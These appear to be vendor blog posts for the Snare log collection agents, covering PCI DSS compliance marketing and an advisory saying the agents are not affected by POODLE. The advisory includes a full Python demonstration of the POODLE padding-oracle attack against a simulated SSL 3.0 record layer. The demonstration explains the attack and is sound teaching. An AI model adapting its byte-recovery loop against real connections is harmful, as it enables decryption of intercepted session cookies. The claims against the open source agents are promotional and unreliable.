Not sure what Snare does? Looking for a logging or SIEM solution but not sure how Snare fits? Our own Gene McGowan threw this video together to quickly cover the full gamut of Snare. Want the fastest overview of Snare possible? Watch this video.

https://youtu.be/o2_hc_WF6Ig

If you have any questions or would like to know more just reach out to us!

We like to tout Snare’s ability to “reduce the noise” in your logging efforts, but what exactly do we mean by that, and why is it important?

Event logging veterans can probably guess that we are talking about the excess data collected by logging solutions. But because collecting everything has been the go-to tactic for so long, all that wasteful data bogging down your network and driving up SIEM costs may not look like noise at all, just an inconvenient but unavoidable by-product. Many more people probably don’t even realize how much junk is clogging up their SIEM and network.

Snare started off as the only rock-solid log collector that could bring together logs from disparate systems and aggregate them for analysis. In other words, you could count on your logs actually getting collected, something far too many tools still can’t guarantee, and you could see your syslog and Windows event logs in one place. Snare Agents are also SIEM-agnostic, so no matter which SIEM solution you opted to buy, if you were having trouble getting logs into it you could plug in Snare Agents to solve the problem. SIEM vendors picked up on this and began recommending Snare Agents as a complement to their products, and that is how we took off.

Fast forward a bit, and we here at Intersect Alliance wanted to take it a step further. Clients around the globe had a long list of nice-to-haves, things that would make their SIEM efforts more efficient and more effective. This was the genesis of the premium features you see today: managing audit policy, truncation of Windows event descriptive text, and multi-tiered filtering.

Cool, huh? Well, we think so. Our roadmap has filled out and we are excited to continue bringing more premium features to our Snare suite.

If you’re dealing with any form of payment card data, then starting in January 2015 security audits will need to prove PCI DSS 3.0 compliance. Banks, card brands and regulators are stepping up enforcement in the face of recent significant breaches at name-brand companies. If you are running the unsupported open source agent for event logging, you will most likely fail your audit, as it does not address several key aspects of the PCI DSS v3.0 audit requirements:

1. There is no technical, product, vendor or customer support; i.e. you are running an unsupported security tool/platform.
2. More than half of the critical event log data is in the custom event logs, which are not processed by the open source agents, allowing forensic evidence to be lost.**
3. Best practices such as event data encryption, reliable TCP delivery, and caching in case of network outages or spikes are not available.

To take a crucial step towards compliance, we encourage you to try the Snare Enterprise Agents, which are used by the world’s leading organizations and enterprises in finance, defense, e-commerce and retail.

Snare Enterprise Agents assist with PCI DSS compliance by collecting all applicable event logs out of the box. To learn how the Snare Enterprise Agent is used to address PCI, see PCI DSS Best Practices with Snare Enterprise Agents.

For Snare Server, sample PCI objectives may be loaded. Go to SYSTEM\Administrative Tools\Snare Server Configuration Wizard\ and navigate to the section on additional objectives near the bottom of the list. Select the last option, which imports from the local system. Once loaded, the extra objectives appear in the Reports menu under Compliance Pack, which contains NISPOM, SOX and PCI. From there you can copy/clone these objectives and customise them to suit your needs.


** Warning about Open Source logging: You risk missing more than half of your critical logs

The open source agents will not stand up to compliance or auditing standards (e.g. PCI): more than half of the critical logs are not captured, including privileged user activity, system and Group Policy changes, DHCP logs, system time changes, host firewall policy changes and access logs, Terminal Services access, and print logs, to name a few. Using the open source versions therefore risks failing audits, and you will not be able to detect all serious malicious attacks or unauthorized changes on your systems. This can lead to loss of customer data, major brand damage and significant financial penalties, depending on which standard has been failed and the degree of damage caused. There are approximately 70 system event logs from which you will not collect details.

The POODLE attack (Padding Oracle On Downgraded Legacy Encryption) is a man-in-the-middle attack that exploits the fallback to SSL 3.0 in Internet and security software clients. An attacker who can both intercept a connection and force it down to SSL 3.0 can use the weak CBC padding check in SSL 3.0 as an oracle to decrypt selected bytes of the traffic, such as a session cookie, one byte at a time.

The Snare Agents are not affected by POODLE. The attack needs a client that the attacker can make resend the same secret (typically an HTTP cookie) over and over at positions the attacker controls, which in practice means injected browser script; Snare does not use cookies on its connections, and the agent-to-server session is not a browser an attacker can script.

It is also a client-side attack that requires a man-in-the-middle position on the internal network between agent and server, which is itself a low-probability event, and most Snare Servers sit on restricted networks. The overall risk is therefore low. The advisory’s general remedy, disabling SSL 3.0 in favour of TLS on both ends, still applies to any other service running on those hosts.

For additional information review US-CERT TA14-290A.
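To make the precondition above concrete, here is an added example written for this page (it is not Snare code) that simulates an SSL 3.0 CBC record layer and runs the POODLE byte-recovery loop against it. The block cipher is a toy Feistel construction standing in for the real cipher, the HMAC-based tag stands in for SSL 3.0’s own MAC, and the key, the cookie value and the request layout are constructed for the demonstration; the oracle itself is faithful: the server inspects only the last byte of the padding, so each attacker-forged record is accepted with probability 1/256 and every acceptance reveals one byte of the cookie. Note what the attacker needs from the client: the ability to set the request length (URL and body) so that the target byte lands at the end of a block, and to make the client resend the secret hundreds of times. That is what a browser running attacker-supplied script provides, and what a log agent’s fixed connection does not.

```python
"""POODLE padding-oracle demonstration against a simulated SSL 3.0 CBC record layer.
Added example for this page; cipher, key, cookie and request layout are constructed."""
import hashlib
import hmac
import os

BLOCK = 16
MAC_LEN = 16
KEY = os.urandom(32)            # session key shared by the simulated client and server
SECRET = b"sid=9f1c0a27d3e4"    # constructed cookie the attacker wants (16 bytes)

# Fixed parts of the victim's request; the attacker's script controls the
# URL padding and body length but never sees the cookie.
HEAD = b"POST /"
MID = b" HTTP/1.0\r\nCookie: "
TAIL = b"\r\n\r\n"


def _xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def _f(half: bytes, key: bytes, rnd: int) -> bytes:
    return hashlib.sha256(key + bytes([rnd]) + half).digest()[:8]


def block_encrypt(key: bytes, block: bytes) -> bytes:
    # Toy 4-round Feistel cipher standing in for the real block cipher. The
    # attack depends only on CBC chaining and the padding check, not on the cipher.
    l, r = block[:8], block[8:]
    for i in range(4):
        l, r = r, _xor(l, _f(r, key, i))
    return l + r


def block_decrypt(key: bytes, block: bytes) -> bytes:
    l, r = block[:8], block[8:]
    for i in reversed(range(4)):
        l, r = _xor(r, _f(l, key, i)), l
    return l + r


def _mac(data: bytes) -> bytes:
    return hmac.new(KEY, data, hashlib.sha256).digest()[:MAC_LEN]


def ssl3_encrypt_record(data: bytes) -> bytes:
    # SSL 3.0 record body: data || MAC || padding || padding_length. Only the
    # length byte is specified; the padding bytes themselves are arbitrary.
    body = data + _mac(data)
    pad_len = BLOCK - 1 - len(body) % BLOCK
    body += os.urandom(pad_len) + bytes([pad_len])
    iv = os.urandom(BLOCK)
    out, prev = [iv], iv
    for i in range(0, len(body), BLOCK):
        prev = block_encrypt(KEY, _xor(body[i:i + BLOCK], prev))
        out.append(prev)
    return b"".join(out)


def ssl3_decrypt_record(record: bytes) -> bool:
    # Server side: CBC-decrypt, look ONLY at the last byte to decide how much
    # padding to strip, then verify the MAC. Returns True if the record is accepted.
    if len(record) % BLOCK or len(record) < 2 * BLOCK:
        return False
    plain, prev = b"", record[:BLOCK]
    for i in range(BLOCK, len(record), BLOCK):
        cur = record[i:i + BLOCK]
        plain += _xor(block_decrypt(KEY, cur), prev)
        prev = cur
    pad_len = plain[-1]
    if pad_len >= BLOCK or len(plain) < pad_len + 1 + MAC_LEN:
        return False
    body = plain[:-(pad_len + 1)]
    return hmac.compare_digest(body[-MAC_LEN:], _mac(body[:-MAC_LEN]))


def victim_request(path_pad: int, body_len: int) -> bytes:
    # The browser sends whatever the attacker's script asks for, plus the cookie.
    return ssl3_encrypt_record(HEAD + b"a" * path_pad + MID + SECRET + TAIL + b"b" * body_len)


def recover_secret(max_tries_per_byte: int = 20000) -> bytes:
    recovered = bytearray()
    for k in range(len(SECRET)):
        # 1. Choose the URL length so cookie byte k is the last byte of a block.
        pos0 = len(HEAD) + len(MID) + k
        path_pad = (BLOCK - 1 - pos0) % BLOCK
        target = (pos0 + path_pad) // BLOCK        # 0-based plaintext block holding byte k
        # 2. Choose the body length so data+MAC fills whole blocks, making the
        #    final record block pure padding with padding_length == 15.
        fixed = pos0 + path_pad + 1 + (len(SECRET) - k - 1) + len(TAIL) + MAC_LEN
        body_len = (-fixed) % BLOCK
        for _ in range(max_tries_per_byte):
            rec = victim_request(path_pad, body_len)
            blocks = [rec[i:i + BLOCK] for i in range(0, len(rec), BLOCK)]  # blocks[0] is the IV
            c_prev, c_target, c_last_prev = blocks[target], blocks[target + 1], blocks[-2]
            # 3. Swap the target ciphertext block into the final position. The server
            #    decrypts it as P' = D(C_target) XOR C_{n-1} and accepts iff P'[15] == 15.
            forged = b"".join(blocks[:-1]) + c_target
            if ssl3_decrypt_record(forged):
                # P_target[15] = D(C_target)[15] XOR C_prev[15], and acceptance told us
                # that D(C_target)[15] == 15 XOR C_{n-1}[15].
                recovered.append(15 ^ c_last_prev[-1] ^ c_prev[-1])
                break
        else:
            raise RuntimeError("oracle never accepted; alignment is wrong")
    return bytes(recovered)


if __name__ == "__main__":
    print("recovered cookie:", recover_secret())
```

Running the script prints the recovered cookie after a few thousand simulated requests (on average 256 per byte). TLS 1.0 and later require every padding byte to equal the length byte, which removes this oracle; that is why the advisory’s remedy is to disable SSL 3.0 rather than to patch individual clients.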